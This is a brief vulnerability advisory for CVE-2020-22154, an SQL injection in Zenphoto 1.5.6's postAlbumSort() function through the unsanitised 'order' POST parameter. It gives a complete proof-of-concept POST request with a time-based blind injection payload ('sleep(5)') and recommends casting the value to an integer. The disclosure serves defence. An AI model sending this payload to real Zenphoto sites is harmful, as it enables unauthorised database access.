CVE-2020-22154

February 12, 2020 One minute read

Zenphoto 1.5.6 was discovered to contain a SQL injection via the postAlbumSort() function in /zp-core/admin-functions.php.

mitre: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-22154

Description:
The function postAlbumSort() triggers a SQL query using the POST parameter order, unfortunately his value is not sanitized when building the query.

Details:
File: /zp-core/admin-functions.php
Function: postAlbumSort()
Parameter: order

Payload:

POST /zp-core/admin-edit.php?page=edit&action=savealbumorder
XSRFToken=bfc6ec5b3fdffce396ca60b824b68e3eb18a5d4c&checkallaction=noaction&newtag_mass_tags_=&massownerselect=admin&order=id%5B2 and (select sleep(5))%23%5D%3Dnull%26id%5B1%5D%3Dnull&update=Save+Order

Recommendation:
Cast the value to integer.

PoC:
cve-2020-22154 Zenphoto sqli